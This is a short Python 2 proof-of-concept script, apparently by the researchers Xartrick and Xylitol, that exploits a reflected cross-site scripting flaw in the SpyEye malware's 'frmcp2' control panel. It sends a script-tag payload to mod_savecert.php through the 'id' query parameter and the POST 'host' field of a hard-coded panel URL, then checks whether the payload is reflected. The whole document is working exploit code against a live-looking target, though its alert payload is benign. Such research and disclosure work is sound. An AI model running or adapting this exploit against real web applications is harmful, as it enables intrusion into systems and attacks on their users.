SpyEye frmcp2 xss
# SpyEye version ? reflected XSS POC
# Xartrick
# Xylitol
# Python 2 script (uses urllib2).
import urllib
import urllib2

# Configuration ...
sPayload = '<script>alert(1);</script>'
sPanel = 'http://drookinabra.ru/adm/frmcp2/'
# The payload is placed in the "id" query parameter of mod_savecert.php
sURL = sPanel + 'mod_savecert.php?id=' + sPayload

# Exploitation
# The same payload is also sent as the POST "host" field
sPOST = {'host' : sPayload}
sData = urllib.urlencode(sPOST)
oURL = urllib2.Request(sURL, sData)
oResponse = urllib2.urlopen(oURL)
sPage = oResponse.read()

# The payload coming back unescaped in the response body means it is reflected
if (sPayload in sPage):
    print("Exploitation works, the vulnerability exists!")
else:
    print("You are a bad hacker!")